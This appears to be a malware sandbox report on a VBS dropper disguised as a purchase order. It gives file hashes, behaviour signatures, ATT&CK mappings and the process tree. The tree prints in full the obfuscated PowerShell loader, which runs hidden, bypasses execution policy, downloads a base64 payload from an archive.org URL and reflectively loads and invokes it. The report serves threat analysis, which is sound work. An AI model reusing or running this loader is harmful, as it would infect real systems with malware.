e20d35f98482f8c1f6e12f62c4c7136add7ef0fa7c09fc82bce4f958831d8c74

General

Target

PURCHASE ORDER_0002341259-SCB.vbs
Size

507KB
MD5

8826da2dae531f219269ca314cec4f88
SHA1

a5c24e29d2b9901a0849fe4c70dd67733febcb57
SHA256

3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b
SHA512

9899a75d918671927f0dce5824135427899d75c88c153f78e8fa9ca5d39383a2cb33d092376ae631f507a3bd855636968724d9509d180e2c3a0a307a697e7de5
SSDEEP

12288:r4IJKsC/UX6neBCN6Jy7f24Sjmr8NeAkWrIXbl/MCmgdTQFq30+XDNNRsgbZAKIo:kkgn2MHhso/

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2860	powershell.exe
6	2860	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2764	powershell.exe
2860	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2764	powershell.exe
2860	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1348 wrote to memory of 2764	1348	WScript.exe	30
PID 1348 wrote to memory of 2764	1348	WScript.exe	30
PID 1348 wrote to memory of 2764	1348	WScript.exe	30
PID 2764 wrote to memory of 2860	2764	powershell.exe	32
PID 2764 wrote to memory of 2860	2764	powershell.exe	32
PID 2764 wrote to memory of 2860	2764	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER_0002341259-SCB.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
28cbf6c33e65e2db762b8afe0cdedc5a

SHA1
bc4e0ed179be7a04458ad409035ed70888e5280c

SHA256
60173949815b39d9615ecf772e791b4266d920da7fbbae9aacebfac2e1bf59db

SHA512
fcbcf6bd81a201ab923786c7acc9ca4df3d02286f7a5f3d03646a25af5bd70fc995bf5bcbd28a49767056f75597b3d90e9f0c43508ca07757b6f255b7de7d988

Download Submit
memory/2764-4-0x000007FEF5BAE000-0x000007FEF5BAF000-memory.dmp

Filesize
4KB

Download
memory/2764-5-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download
memory/2764-7-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/2764-6-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-8-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-10-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-9-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-11-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-17-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2764-18-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing